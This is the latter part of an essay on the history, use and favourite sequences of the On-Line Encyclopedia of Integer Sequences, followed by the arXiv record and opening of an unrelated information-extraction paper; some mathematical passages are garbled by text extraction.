hundred entries, I entered them on punched cards,2 which made it easier to check and sort them. The _Handbook_ was typeset directly from the punched cards. There were a few errors in the book, but almost all of them were caused by errors in the original publications. Accuracy was a primary concern in that book, as it is today in the OEIS. Footnote 2: These were never called “punch cards” (sic). To anyone who worked with them in the 1960s, “punch cards” sounds like “grill cheese” (sic) for “grilled cheese”, or “barb wire” (sic) for “barbed wire”, both of which I have recently seen in print. The book was an instant success. It was, I believe, the world's first dictionary of integer sequences (and my original title said _Dictionary_ rather than _Handbook_). Many people said "What a great idea", and wondered why no one had done it before. Martin Gardner recommended it in the _Scientific American_ of July 1974. Lynn A. Steen, writing in the _American Mathematical Monthly_ said "Incomparable, eccentric, yet very useful. Contains thousands of 'well-defined and interesting' infinite integer sequences together with references for each... If you ever wondered what comes after \(1,2,4,8,17,35,71,\ldots\), this is the place to look it up". Harvey J. Hindin, writing from New York City, exuberantly concluded a letter to me by saying: "There's the _Old Testament_, the _New Testament_, and the _Handbook of Integer Sequences_." I never did find the sequence that started it all in the literature, but I learned Polya's theory of counting, and with John Riordan's help found the answer, which appears in [16] and A000435. ### The _Encyclopedia of Integer Sequences_ Following the publication of the _Handbook_, a large amount of correspondence ensued, with suggestions for further sequences and updates to the entries. By the early 1990's over a cubic meter of new material had accumulated. A Canadian mathematician, Simon Plouffe, offered to help in preparing a revised edition of the book, and in 1995 _The Encyclopedia of Integer Sequence_, by me and Simon Plouffe, was published by Academic Press. It contained 5487 sequences, occupying 587 pages. By now punched cards were obsolete, and the entries were stored on magnetic tape. ### The _On-Line Encyclopedia of Integer Sequences_ Again, once the book appeared, many further sequences and updates were submitted from people all over the world. I waited a year, until the size of the collection had doubled, to 10000 entries, and then in 1996 I launched _The On-Line Encyclopedia of Integer Sequences_ (now usually called simply the _OEIS_) on the Internet. From 1996 until October 26, 2009, it was part of my homepage on the AT&T Labs website. Incidentally, in 2004 the database was mentioned by the Internet website _slashdot_ ("News for Nerds. Stuff that Matters"), and this brought so much traffic to my Bell Labs homepage that it briefly crashed the whole Bell Labs website. My boss was quite proud of this, since it was a rare accomplishment for the Mathematics and Statistics Research Center. ### _The OEIS Foundation_ In 2009, in order to ensure the long-term future of the database, I set up a non-profit foundation, _The OEIS Foundation Inc._, a 501(c)(3) Public Charity, whose purpose is to own, maintain and raise funds to support _The On-Line Encyclopedia of Integer Sequences_ or _OEIS_. On October 26, 2009, I transferred the intellectual property of _The On-Line Encyclopedia of Integer Sequences_ to the Foundation. A new OEIS with multiple editors was launched on November 11, 2010. Since then it has been possible for anyone in the world to propose a new sequence or an update to an existing sequence. To do this, users must first register, and then submissions are reviewed by the editors before they become a permanent part of the OEIS. Technically the OEIS is now a "moderated wiki". I started writing this article on November 11, 2022, noting that this marked twelve years of successful operation of the online OEIS, and also that the database is in its 59th year of existence. ## 3 The database today ### What sequences are included? From the very beginning the goal of the database has been to include all "interesting" sequences of integers. This is a vague definition, but some further examples may make it clearer. The database includes a huge number of familiar and unfamiliar sequences from mathematics (the prime numbers \(2,3,5,7,11,13,\ldots\), A000040; \(60,168,360,504,660,1092,\ldots\), the orders of noncyclic simple groups, A001034), computer science \((0,1,3,5,8,11,14,\ldots\), the number of comparisons needed for merge sort, A001855), physics (see "self-avoiding walks on lattices", Ising model, etc., e.g. A002921), chemistry (the enumeration of chemical compounds was one of the motivations behind Polya's theory of counting, see e.g. A000602), and not least, from puzzles and I.Q. tests \((1,8,11,69,99,96,111,\ldots\), the "strobogrammatic" numbers, guess!, or see A000787; \(4,14,23,34,42,50,59,\ldots\), the numbered stops on the New York City A train subway, A011554. That entry has links to a map and the train schedule). Sequences that have arisen in the course of someone's work--especially if published--have always been welcomed. On the other hand, sequences that have been proposed simply because they were missing from the database are less likely to be accepted. There are a few hard and fast rules. The sequence must be well-defined and the terms must not be time-dependent--if the next term is only known to be either 14 or 15, for instance, then the sequence must end with the last term that is known for certain. The sequence may not have any missing terms or gaps. In the case of Mersenne primes, for instance (A000043) it is common for later primes to be known before all intermediate numbers having been tested. The later primes get mentioned in comments, but they are not as part of the main sequence until their position has been confirmed. Very short sequences and sequences that are subsequences of many other sequences are not accepted. A sequence for which the only known terms are \(2,3,5,7\) would not be accepted since it is matched by a large number of existing sequences. The definition may not involve an arbitrary but large parameter (primes ending in 1 are fine, A030430, but not primes ending in 2023). The OEIS Wiki has a section listing additional examples of what not to submit, as well as a great deal of information about the database that I won't repeat here, such as the meaning of the various keywords, the definition of the "offset" of a sequence, descriptions of the submission and editorial processes, and a list of over \(10,000\) citations of the OEIS in the scientific literature. Most OEIS entries give an ordered list of integers. But triangles of numbers are included by reading them row-by-row. For example, Pascal's triangle becomes \(1,\ 1,1,\\ 1,2,1,\ 1,3,3,1,\ldots\), A007318. Doubly-infinite square arrays are included by reading them by antidiagonals: the standard multiplication table for positive integers becomes \(1,\ 2,2,\ 3,4,3,\ 4,6,6,4,\ldots\), A003991. Sequences of fractions are included as a linked pair giving the numerators and denominators separately (the Bernoulli numbers are A027641/A027642). Important individual real numbers are included by giving their decimal or continued fraction expansions (for \(\pi\) see A000796 and A001203). A relatively small number of sequences of nonintegral real numbers are included by rounding them to the nearest integer, or by taking floors or ceilings (the imaginary parts of the zeros of Riemann's zeta function give A002410). Two less obvious sources for sequences are binomial coefficient identities and number theoretic inequalities. The values of either side of the identity \[\sum_{k=0}^{n}\binom{2n}{k}^{2}\ =\ \frac{1}{2}\binom{4n}{2n}-\frac{1}{2}\binom{2n}{n }^{2}\] [9, (3.68)] give A036910. From the inequality \(\sigma(n)<n\sqrt{n}\) for \(n>2\), [12, Sect. III.1.1.b], we get the integer sequence \(\lfloor n\sqrt{n}\rfloor-\sigma(n)\), A055682. The point is that if you want to know if this inequality is known, you look up the difference sequence, and find A055682 and a reference to the proof. Many more sequences of these two types should be added to the database. ### How the database is used The main applications of the database are in identifying sequences or in finding out the current status of a known sequence. Barry Cipra has called it a mathematical analogue of a "fingerprint file". You encounter a number sequence, and wish to know if anyone has ever come across it before. If your sequence is in the database, the reply will give a definition, the first 50 or so terms, and, when available, formulas, references, computer code for producing the sequence, links to any relevant web sites, and so on. Figures 3 and 4 show what happens if you submit \(1,2,5,14,42,132,429\), the first few Catalan numbers, one of the most famous sequences of all. I could have chosen a simpler example, like the Fibonacci numbers, but I have a particular reason for choosing the Catalan numbers. When the OEIS was new, people would sometimes say to me that they had a sequence they were trying to understand, Figure 3: The result of submitting \(1,2,5,14,42,132,429\) to the database. This figure shows the banner at the top of the reply. There are 26 matches, ranked in order of importance, the top match being the one we want, the Catalan numbers. A shortened version of the top match is shown in the next figure. and would I show them how to use the database. At least twice when I used the Catalan sequence as an illustration, they said, why, that is my sequence, how on earth did you know? It was no mind-reading trick, the Catalan numbers are certainly the most common sequence that people don't know about. This entry is the longest--and one of the most important--in the whole database. If we do not find your sequence in the database, we will send you a message inviting you to submit it (if you consider it is of general interest), so that the next person who Figure 4: The entry for the Catalan number A000108. The full entry has over 750 lines, which have been edited here to show samples of the different fields. comes across it will be helped, and your name will go on record as the person who submitted it. The second main use of the database is to find out the latest information about a particular sequence. Of course we cannot hope to keep all 360000 entries up-to-date. But when a new paper is published that mentions the OEIS, Google will tell us, and we then add links to that paper from any sequence that it mentions. People have told us that this is one of the main ways they use the OEIS. After all, even a specialist in (say) permutation groups cannot keep track of all the papers published worldwide in that area. And if a paper in a physics journal happens to mention a number-theoretic sequence, for example, that is unlikely to be noticed by mathematicians. There are also many other ways in which the database has proved useful. For example, it is an excellent source of problems to work on. The database is constantly being updated. Every day we get thirty to fifty submissions of new sequences, and an equal number of comments on existing entries (new formulas, references, additional terms, etc.). The new sequences are often sent in by non-mathematicians, and are a great source of problems. You can see the current submissions at [https://oeis.org/draft](https://oeis.org/draft). Often enough you will see a sequence that is so interesting you want to drop everything and work on it. And remember that we are always in need of more volunteer editors. In fact anyone who has registered with the OEIS can suggest edits, you do not even need to be an official editor. We have been the source of many international collaborations. There is also an educational side: several people have told us that they were led into mathematics through working as an editor. Here is a typical story. Subject: Reminiscence from a young mathematician I wanted to relay a bit of nostalgia and my heartfelt thanks. Back in the late 1990s, I was a high school student in Oregon. While I was interested in mathematics, I had no significant mathematically creative outlet until I discovered the OEIS in the course of trying to invent some puzzles for myself. I remember becoming a quite active contributor through the early 2000s, and eventually at one point, an editor. My experience with the OEIS, and the eventual intervention of one of my high school teachers, catalyzed my interest in studying mathematics, which I eventually did at [...] College. I went on to a Ph.D. in algebraic geometry at the University of [...], and am currently at [...]. I wanted to thank you for seriously engaging with an 18-year old kid, even though I likely submitted my fair share of mathematically immature sequences. I doubt I would have become a mathematician without the OEIS! A less-obvious use of the database is to quickly tell you how hard a problem is. I use it myself in this way all the time. Is the sequence "Catalan" or "Collatz"? If a sequence comes up in your own work, or when reviewing someone else's work, it is useful to know right away if this is a well-understood sequence, like the Catalan numbers, or if it is one of the notoriously intractable problems like the Collatz or \(3x+1\) problem (A006577). Finally, the OEIS is a welcome escape when you feel the world is falling apart. Take a look at Scott Shannon's drawings of stained glass windows in A331452; or Jonathan Wild's delicate illustrations of the ways to draw four circles in A250001; or Eric An gelini's "1995" puzzle (A131744) or any of his "lexicographically earliest sequences" (A121053, A307720, and many more); or find better solutions to the Stepping Stones Problem (SS4.5,A337663). You can find brand new problems at any hour of the day or night by looking at the stack of recent submissions: but beware, you may see a problem there that will keep you awake for days. Or search in the database for phrases like "It appears that...", or "Conjecture:...", or "It would be nice to know more!" ### Layout of a typical entry This is a good place to mention some of the features of an OEIS entry. Most of the fields (see Figs. 3 and 4) are self-explanatory. At the top it tells you how many matches were found to your query (26 in the example). These are ranked in order of importance. The DATA section shows the start of the sequence, usually enough terms to fill a few lines on the screen (typically 300 to 500 decimal digits). Often one wants more terms than are shown, and the first link in the entry will point to a plain text file with perhaps 10000 or 20000 terms. That file will have a name like b001006.txt, and is called the "b-file" for the sequence. Some entries also have much larger tables, giving a million or more terms. If you click the "graph" button near the top of the reply, you will be shown two plots of the sequence, and if you click the "listen" button, you can listen to the sequence played on an instrument of your choice. The default instrument is the grand piano, and the terms of the sequence would be mapped to the 80 keys by reducing the numbers mod 80 and adding 1. I conclude this section with a philosophical comment. When you are seriously trying to analyze a sequence, and are prepared to spend any amount of time needed (searching for a formula or recurrence, for instance), you need all the help you can get, which is why we provide the b-files and other data files, and why we give computer programs in so many languages. This is also the reason we give as many references and links as possible for a sequence. Even if the reference is to an ancient or obscure journal, or one that has been accused as being "predatory", we still give the reference, especially for sequences that are not well-understood. The same thing holds for formulas, comments, and cross-references to other sequences. When you are desperate, you will accept help from anywhere. And do not forget "Superseeker"! ### Arrangement of the entries The entries in the database are (virtually) arranged in two different ways, the first essentially chronological, the second lexicographic. The first is by their _absolute_ identification number, or A-number.3 Once the collection reached a few hundred entries, I sorted them into lexicographic order and numbered them A1, A2, A3, \(\ldots\). A1 gives the number of symmetry groups of order \(n\), A2 is the famous Kolakoski sequence, and so on. This numbering is still used today, only A1 has become A000001, A2 is A000002,..., and as each new submission comes in it gets a number from the stack. Current sequences are being issued numbers around A360000. Rejected A-numbers are recycled, so there are no gaps in the order. We reached 100000 entries in 2004, and 250000 in 2015. The present growth rate is about 12000 new entries each year. The second arrangement is a kind of lexicographic ordering. First I describe an idealized, theoretical, lexicographic order. Sequences of nonnegative numbers can be arranged in lexicographic (or dictionary) order. For example, sequences beginning \(1,2,4,\ldots\) come before \(1,2,5,\ldots\), \(1,2,4,3,\ldots\), \(1,3,\ldots\), etc., but after \(1,2,3,\ldots\). Also \(1,2,4,\ldots\) comes after the two-term sequence \(1,2\) (because blanks precede numbers). More formally, we compare the two sequences term-by-term, and in the first position where they differ whichever is smaller (or blank) is the lexicographically earlier sequence. For sequences with negative terms, we ignore the signs and sort according to the absolute values. Here is the actual ordering used in the OEIS. The sequences are arranged (virtually) into a version of lexicographic order, according to the following rules. First, delete all minus signs. Then find the first term that is greater than \(1\), and discard all the terms before it. What's left determines its position in the lexicographic order. For example, to place \(-1,0,1,1,\underline{2},1,17,3,2,1,\ldots\) in the ordering, we would ignore the terms before the underlined \(2\), and consider the sequence as beginning \(2,1,17,3,2,1,\ldots\). Sequences that contain only \(0\)s, \(1\)s and \(-1\)s are sorted into lexicographic order by absolute value and appear at the beginning of the ordering. The first sequence in the database is therefore the zero sequence A000004. In this way every sequence has a unique position in the ordering. The sequences have been sorted in this way since the 1960s. For the first ten years the punched card entries were physically sorted into this order. When you look at an OEIS entry, A005132 say (the subject of Section 4.1), towards the bottom you will see two lines like4 Footnote 4: If you don’t see these, click on the A-number at the top of the entry. Sequence in context: A277558 A350578 A335299 * A064388 A064387 A064389 Adjacent sequences: A005129 A005130 A005131 * A005133 A005134 A005135 which tell you the three entries immediately before and after that entry in the lexicographic ordering, and the three entries before and after it in the A-numbering. The asterisks represent the sequence you are looking at. The first group can be useful if you are uncertain about a term in your sequence, the second in case you want to look at other sequences submitted around that time. Today the sequences are actually stored internally in an SQLite database. However, the punched card format has been so useful that when you view a sequence, as in Fig. 4, it is still presented to you in something very like the old punched card format. ### Summary: "A Handbook of Integer Sequences" today * Now _The On-Line Encyclopedia of Integer Sequences_ or _OEIS_: [https://oeis.org](https://oeis.org) * Accurate information about 360000 sequences. * Definition, formulas, references, links, programs. View as list, table, graph, music! * Traffic: 1 million hits/day. * 30 new entries, 50 updates every day. * Often called one of best math sites on the Web. Fingerprint file for mathematics. * Street creds: 10000 citations. * A moderated Wiki, owned by OEIS Foundation, a 501(c)(3) public charity. * Uses: to see if your sequence is new, to find references, formulas, programs. * Catalan or Collatz? (Very easy or very hard?) * Source of fascinating research problems;5 low-hanging fruit from recent submissions. Footnote 5: Look for “Conjecture”, “It appears that”, “It would be nice to”,... * Accessible (free, friendly). * Fun \((1,2,4,6,3,9,12,8,10,5,15,...?)\). Interesting, educational. Escape. * Addictive (better than video games). * Has led many people into mathematics. * One of the most successful international collaborations, a modest contribution towards world peace. * Need editors. ## 4 Some favorite sequences I'm sometimes asked what my favorite sequence is. This is a difficult question. I'm tempted to reply by saying: If you were the keeper of the only zoo in the world, how would you answer that question? (Because that is roughly the situation I'm in.) Would you pick one of the exotic animals, a giraffe, a kangaroo, or a blue whale? Or one of the essential animals, like a horse, a cow, or a duck? If the question came from a visiting alien, of course, there is only one possible answer: a human being. For sequences, the essential ones are the primes, the powers of 2, the Catalan numbers, or (especially if the question came from an alien with no fingers or toes), the counting sequence 0, 1, 2, 3, 4,... (A001477). But here I'll mention a few that are fairly exotic. The Recaman and Gijswijt sequences have simple recursive definitions, yet are astonishingly hard to understand. ### Recaman's sequence (A005132) This remarkable sequence has resisted analysis for over 30 years, even though we have computed an astronomical number of terms. It was contributed to the database by Bernardo Recaman Santos in 1991. The definition is deceptively simple. The first term is 0. We now add or subtract 1, then we add or subtract 2, then add or subtract 3, and so on. The rule is that we always first try to subtract, but we can only subtract if that leaves a nonnegative number that is not yet in the sequence. Otherwise we must add. Here is how the sequence starts. We have the initial 0. We can't subtract 1, because that would give a negative number, so we add 1 to 0. So the second term is 1. We can't subtract 2 from 1, so we add it, getting the third term \(1+2=3\). Again we can't subtract 3, for that would give 0, which has already appeared, so we add 3, getting the fourth term \(3+3=6\). Now we must add or subtract 4, and this time we can subtract, because \(6-4=2\), and 2 is nonnegative and a number that hasn't yet appeared. So at this point the sequence is \(0,1,3,6,2\). Then it continues \(7(=2+5)\), \(13(=7+6),20(=13+7),12(=20-8)\), and so on. The first 16 terms are \[0,1,3,6,2,7,13,20,12,21,11,22,10,23,9,24,\ldots\] When adding rather than subtracting, repeated terms are permitted (42 is repeated at the 24th term). Edmund Harriss has found an elegant way to draw the sequence as a spiral on the number line. Start at 0, and when we subtract \(n\), draw a semicircle of diameter \(n\) to the left from the last point, or to the right if we are adding \(n\). Draw the semicircles alternately below and above the horizontal axis so as to produce a smooth spiral. The main question about this sequence is: Does every positive number appear? What makes this sequence so interesting is that certain numbers (for reasons we do not understand) are extremely reluctant to appear. 4 does not appear until 131 steps, and 19 takes 99734 steps. A group of us at AT&T Bell Labs worked on this sequence in 2001, and developed a way to greatly speed up the computation. Allan Wilks used it to compute the first \(10^{15}\) terms, and found that 2406 (which had been missing for a long time) finally appeared at step 394178473633984. At this point the smallest missing number was \(852655=5\cdot 31\cdot 5501\). Benjamin Chaffin has continued this work, and in 2018 reached \(10^{230}\) terms. However, 852655 was still missing, and there has been no progress since then. Thirty years ago I thought that every number would eventually appear. Now I am not so sure. My current belief is that there are two possibilities: either there are infinitely many numbers that never appear, and 852655 just happens to be the smallest of them, but has no other special property. A similar phenomenon seems to occur when iterating various number-theoretic functions--see the next section. Or, every number will eventually appear (just as presumably every one of Shakespeare's plays will eventually appear in the expansion of \(\pi\) in base 60), although we may never be able to extend the sequence far enough to hit 852655. For the latest information about this sequence (or any other sequence mentioned in this article), consult the OEIS. Open question: Does 852655 appear in A005132? ### Iteration of number-theoretic functions Many mysterious sequences arise from the iteration of number-theoretic functions. A classic problem concerns the iteration of the function \(f(n)=\sigma(n)-n\), the sum of the "aliquot parts" of \(n\) (see Guy [10, SSB6], A001065). For an initial value of \(n\), what happens to the trajectory \(n,f(n),f(f(n)),\ldots\)? All \(n<276\) terminate by entering a cycle (such \(n\) are called "perfect", "amicable", or "sociality" numbers), or reaching a prime, then 1, then 0. But it appears likely that \(n=276\) and perhaps all sufficiently large even numbers, will never terminate [6]. The trajectory of 276 is sequence A008892. At the time of writing, the trajectory has been computed for 2145 terms, and is still growing, term 2145 being a 214-digit number [8]. A098007 gives the number of distinct terms in the trajectory of \(n\), or \(-1\) if the trajectory is unbounded. The value of A098007(276) is unknown. If indeed 276 does go to infinity, it is natural to ask, how did 276 know it was destined to be the first immortal number under the map \(f\)? The answer may be that there are Figure 5: Harriss’s drawing of the first 64 terms of Recamán’s sequence. (The tiny initial semicircle, at the extreme left, is below the axis. It has diameter 1 and joins the points 0 and 1. It continues as a semicircle of diameter 2, above the axis, joining the points 1 and 3.) infinitely many immortal numbers, and 276 just happens to be the first. It got lucky, that's all! Just as 852655 got lucky in Recaman's problem. A similar question, also discussed by Guy [10, SSB41], which has received much less attention, concerns the map \(g(n)=(\sigma(n)+\phi(n))/2\), where \(\phi(n)\) is the Euler totient function A000010. The trajectory may end at 1, a prime, or a fraction, or it may increase monotonically to infinity. Sequence A292108 gives the number of steps in the trajectory, or \(-1\) if the trajectory is infinite. All numbers \(n<270\) have finite trajectories, but it appears that 270 goes increases forever. The trajectory of 270 is A291789. Andrew Booker has given a heuristic argument showing that almost all numbers go to infinity. What makes 270 the first immortal number under \(g\)? Again I suspect it just got lucky! Open questions: Does the trajectory of 276 under \(f\) increase forever? What about the trajectory of 270 under \(g\)? ### Gijswijt's sequence (A090822) For this sequence it will be helpful to remember that chemists do not write \(H-H-O\), they write \(H_{2}\,O\), they do not write \(Al 1 1 1 2 1 1 1 2 1 1 1 2 1 1 1 1 2 1 1 1 2 1 1 2 1 1 2 2 (we took Y = 1 1 2) 1 1 2 1 1 2 2 2 1 1 2 1 1 2 2 2 3 and we have found the first 3, at the 9th term. After a while, a 4 appears at term 220. But Gijswijt was unable to find a 5, and left that question open when he submitted the sequence. Some Bell Labs colleagues computed many millions of terms, but no 5 appeared. Finally, over the course of a long weekend, Fokko van der Bult (a fellow student of Gijswijt's in Amsterdam) and I independently showed that there is a 5. In fact there are infinitely many 5's, but the first one does not appear until about term \(10^{10^{23}}\). The universe would be cold long before any computer search would find it. In the paper we wrote about the sequence [4], we also conjectured that the first time a number \(N>4\) appears is at about term \[2\uparrow(2\uparrow(3\uparrow(4\uparrow(5\uparrow\ldots\uparrow(N-1))))),\] where the up-arrows (\(\uparrow\)) indicate exponentiation. This is a tower of exponents of height \(N-1\). A very recent manuscript by a student of Gijswijt's, Levi van de Pol [14], still under review, has extended our work, and may have proved the above conjecture. I cannot resist adding a further comment about curling numbers, which if true shows that the Gijswijt sequence is in a sense universal. The Curling Number Conjecture asserts that if any finite starting sequence is extended by the rule that the next term is the curling number of the sequence so far, then eventually the curling number will be 1. If true, this implies that if the starting sequence contains no 1s, then the sequence eventually becomes Gijswijt's sequence [5, Th. 23]. In fact I conjecture that this is true for any starting sequence. Open question: Is the Curling Number Conjecture true? ### Lexicographically Earliest Sequences Although there is no space to discuss them in detail, let me just mention that there are many fascinating and difficult sequences in the OEIS whose definition has the form "Lexicographically Earliest Sequence of distinct positive numbers with the property that...", where now we are using lexicographic in its pure sense, as defined in Section 3.4. A favorite example is the EKG (or ECG) sequence A064413, whose definition is the lexicographically earlier infinite sequence of distinct positive numbers with the property that each term after the first has a nontrivial common factor with the previous term [11]. Other L.E.S. examples are the Yellowstone permutation A098550 [2], the Enots Wolley sequence A336957 (the name suggests the definition), and the Binary Two-Up sequence A354169 [7]. Open question: Show that the terms of the Enots Wolley sequence are precisely 1, 2, and all numbers with at least two distinct prime factors. ### The Stepping Stones Problem (A337663) This lovely problem was invented in 2020 by two undergraduates, Thomas Ladouceur and Jeremy Rebenstock. You have an infinite chessboard, and a handful of brown stones, which are worth one point each. You also have an infinite number of white stones, of values 2, 3, 4,\(\ldots\), one of each value. Suppose you have \(n\) brown stones. You start by placing them anywhere on the board. Now you place the white stones, trying to place as many as you can. The rules are that you can only place a white stone labeled \(k\) on a square if the values of the stones on the eight squares around it add up to \(k\). And you must place the white stones in order, first 2, then 3, and so on. You stop when you cannot place the next higher-numbered white stone. The goal is to maximize the highest value that you place. Call this \(a(n)\). Say we start with \(n=2\) brown stones. There are infinitely many squares where they can be placed, but it turns out that the best thing is to place them so they are separated diagonally by a single blank square, as in Fig. 6. Now we start trying to place the white stones. The 2 stone has to go between the two brown (or 1) stones, and then the 3 goes on a square adjacent to the 1 and the 2. There is now a choice for where the 4 goes, but the choice shown in Fig. 6 is the best. (After we have placed the 4, the neighbors of the 3 no longer add up to 3, but that is OK. It is only when we _place_ the 3 that its neighbors must add to 3.) Continuing in this way, we eventually reach 16. There is nowhere to place the 17, so we stop. Ladouceur and Rebenstock showed, using a computer and Figure 6: A solution to the Stepping Stones problem for two starting stones. The high point \(a(2)=16\) here is indicated by an asterisk, as it is in the next three tables. considering all possible arrangements, that \(16\) is the highest value that can be attained with two starting stones. So \(a(2)=16\). This is clearly a hard problem, since the number of possibilities grows rapidly with the number of brown stones. Only six terms of this sequence are known: \(a(1)\) through \(a(6)\) are \(1,16,28,38,49,60\). A solution for \(n=4\) found by Arnauld Chevallier is shown in Fig. 7. There are lower bounds for larger values of \(n\) which may turn out to be optimal. For \(n=7,\ldots,10\) the current best constructions give \(71,80,90,99\). See A337663 for the latest information. We don't know how fast \(a(n)\) grows. There have been a series of upper and lower bounds, initiated by Robert Gerbicz and Andrew Howroyd. The simple linear construction shown in Fig. 8 shows that \(a(n)\geq 6(n-1)\) for \(n\geq 3\). By combining the constructions of Figs. 6 and 8, Menno Verhoeven obtained \(a(n)\geq 6n+3\) for \(n\geq 3\) (Fig. 9). The best lower bound for large \(n\) is due to Robert Gerbicz, who has shown by a remarkable extension of the construction in Figs. 8 and 9 that \(\varliminf_{n\to\infty}a(n)/n>6\). (A preliminary version of his bound gives \(a(n)>6.0128\,n-5621\) for all \(n\), although the exact Figure 8: Every additional \(1\) on the middle row increases the number of white stones by \(6\), showing that \(a(n)\geq 6(n-1)\) for \(n\geq 3\). Figure 7: A solution to the Stepping Stones problem for four starting stones. values of the constants have not been confirmed.) In his construction the "chimney" on the right of Fig. 9 gets expanded into a whole trellis. One might think that with a sufficiently clever arrangement, perhaps extending the construction in Fig. 8 so that the path wraps around itself in a spiral, one could achieve large numbers with only a few starting stones. But a simple counting argument due to Robert Gerbicz shows this is impossible. The current best upper bound is due to Jonathan F. Waldmann, who has shown that \(a(n)<79n+C\) for some constant \(C\). See A337663 for the latest information, including proofs of of the results mentioned here. Open question: Improve the lower and upper bounds on \(a(n)\). The lower bound looks especially weak. ### Stained glass windows In 1998 Poonen and Rubinstein [15] famously determined the numbers of vertices and cells in the planar graph formed from a regular \(n\)-gon by joining every pair of vertices by a chord. The answers are in A006561 and A007678. Lars Blomberg, Scott Shannon, and I have studied versions of this question when the regular \(n\)-gon is replaced by other polygons, for instance by a square in which \(n\) equally-spaced points are placed along each side and each pair of boundary points is joined by a chord. We also studied rectangles, triangles, etc. In most cases we were unable to find formulas for the numbers of vertices or cells, but we collected a lot of data, and the graphs, when colored, often resemble Figure 9: Combining the constructions of of Figs. 6 and 8 gives \(a(n)\geq 6n+3\) for \(n\geq 3\). The case \(n=5\) is shown. For other values of \(n\), adjust the height of the “chimney” on the right. stained glass windows (see [3] and the illustrations in A331452 and other sequences cross-referenced there).6 So we consoled ourselves with the motto: if we can't solve it, make art! Footnote 6: There is no fee for downloading images from the OEIS, but if you use any of them, please credit the source! The most promising case to analyze seemed to be the \(n\times 2\) grid (although we did not succeed even there). Open question: How many vertices and cells are there in the graph for the \(n\times 2\) grid, as illustrated for \(n=4\) in Fig. 10? Sequences A331763 and A331766 give the first 100 terms, yet even with all that data we have not found a formula. The case of an \(n\times n\) grid seems even harder. Figure 11 shows the \(6\times 6\) graph. Sequences A331449 and A255011 give the numbers of vertices and cells for \(n\leq 42\) Figure 10: A \(4\times 2\) grid of squares with every pair of boundary points joined by a chord. The graph has 213 vertices and 296 cells. The cells are color-coded to distinguish triangles (red), quadrilaterals (yellow), and pentagons (blue). A334699 enumerates the cells by number of sides. In the summer of 2022 Scott Shannon and I considered several other families of planar graphs. I cannot resist showing one of Shannon's graphs, a \(16\times 16\) grid, illustrating the 16th term of A355798 (Fig. 12). There are 61408 cells. Although Shannon has calculated 40 terms of this sequence, again no formula is known. ### Other sequences I would have liked to include If I had had more space I would also have discussed some very interesting sequences arising from: - Dissecting a square to get a regular \(n\)-gon (A110312). - Gerrymandering (A341578, A348453, and many others). - In how many ways can circles overlap? (A250001). Figure 11: A \(6\times 6\) grid with every pair of boundary points joined by a chord. There are 4825 vertices and 6264 cells. - The Inventory sequence A342585. - Kaprekar's junction numbers (A006064, [1]). - The kissing number problem (A001116, A257479). - The neural network problem that started it all (A000435). - Squares in the plane (A051602). And (maybe!) meta-sequences such as A051070 (\(a(n)\) is the \(n\)th term of \(A_{n}\)) and A107357 (the \(n\)th term is 1 + the \(n\)th term of \(A_{n}\)). A final comment: there are many videos on the Internet of talks I have given about sequences. There are over twenty videos that Brady Haran and I have made that have appeared on the Youtube Numberphile channel (and have been viewed over eight million times). See for example "Terrific Toothpick Patterns". Figure 12: Scott Shannon’s “Magic Carpet” graph, illustrating A355798(16). Acknowledgments I would like to thank some good friends who have helped me and the OEIS over the years: David L. Applegate, William Cheswick, Russ Cox, Susanna S. Cuyler, Harvey P. Dale, Ronald L. Graham, Richard K. Guy, Marc LeBrun, John Riordan, and Doron Zeilberger. There are many active volunteer editors, and it is impossible to thank them all. But I would like to give particular thanks to Jorg Arndt, Michael S. Branicky, Michael De Vlieger, Amiram Eldar, Charles R. Greathouse IV, Maximilian F. Hasler, Alois P. Heinz, Andrew Howroyd, Sean A. Irvine, Antti Karttunen, Michel Marcus, Richard J. Mathar, Peter Munn, Hugo Pfoertner, Kevin Ryde, Jon E. Schoenfield, Remy Sigrist, and Chai Wah Wu. I also thank the members of the Board of Trustees of the OEIS Foundation, past and present, for all their help, both to me personally and to the OEIS. Figure credits: Figure 1(c): Clifford A. Pickover. Figure 5: Edmund Harriss. Figures 6, 7, 8, and 9 are based on communications from Thomas Ladouceur and Jeremy Rebenstock, Arnauld Chevallier, Skylark Xentha Murphy-Davies, and Menno Verhoeven, respectively. Figures 10 and 11: Lars Blomberg and Scott R. Shannon. Figure 12: Scott R. Shannon. Other figures: the author.
2305.09193
Easy-to-Hard Learning for Information Extraction
Information extraction (IE) systems aim to automatically extract structured information, such as named entities, relations between entities, and events, from unstructured texts. While most existing work addresses a particular IE task, universally modeling various IE tasks with one model has achieved great success recently. Despite their success, they employ a one-stage learning strategy, i.e., directly learning to extract the target structure given the input text, which contradicts the human learning process. In this paper, we propose a unified easy-to-hard learning framework consisting of three stages, i.e., the easy stage, the hard stage, and the main stage, for IE by mimicking the human learning process. By breaking down the learning process into multiple stages, our framework facilitates the model to acquire general IE task knowledge and improve its generalization ability. Extensive experiments across four IE tasks demonstrate the effectiveness of our framework. We achieve new state-of-the-art results on 13 out of 17 datasets. Our code is available at \url{https://github.com/DAMO-NLP-SG/IE-E2H}.
Chang Gao, Wenxuan Zhang, Wai Lam, Lidong Bing
2023-05-16T06:04:14Z
http://arxiv.org/abs/2305.09193v2
# Easy-to-Hard Learning for Information Extraction+ ###### Abstract Information extraction (IE) systems aim to automatically extract structured information, such as named entities, relations between entities, and events, from unstructured texts. While most existing work addresses a particular IE task, universally modeling various IE tasks with one model has achieved great success recently. Despite their success, they employ a one-stage learning strategy, i.e., directly learning to extract the target structure given the input text, which contradicts the human learning process. In this paper, we propose a unified easy-to-hard learning framework consisting of three stages, i.e., the easy stage, the hard stage, and the main stage, for IE by mimicking the human learning process. By breaking down the learning process into multiple stages, our framework facilitates the model to acquire general IE task knowledge and improve its generalization ability. Extensive experiments across four IE tasks demonstrate the effectiveness of our framework. We achieve new state-of-the-art results on 13 out of 17 datasets. Our code is available at [https://github.com/DAMO-NLP-SG/IE-E2H](https://github.com/DAMO-NLP-SG/IE-E2H). ## 1 Introduction Information extraction (IE) is a crucial task in natural language processing (NLP) that involves extracting structured knowledge from unstructured text data Bing et al. (2013, 2015), enabling various applications such as information retrieval Ruambo and Nicholas (2019), knowledge graph construction Oramas et al. (2016); Wang et al. (2019), and question answering Khot et al. (2017). Depending on what kind of information is to be extracted, IE consists of a wide range of tasks, including named entity recognition (NER) Li et al. (2022), joint entity and relation extraction (RE) Taille et al. (2020); Chia et al. (2022), event extraction (EE) Li et al. (2022), and aspect-based sentiment analysis (ABSA) Zhang et al. (2022). 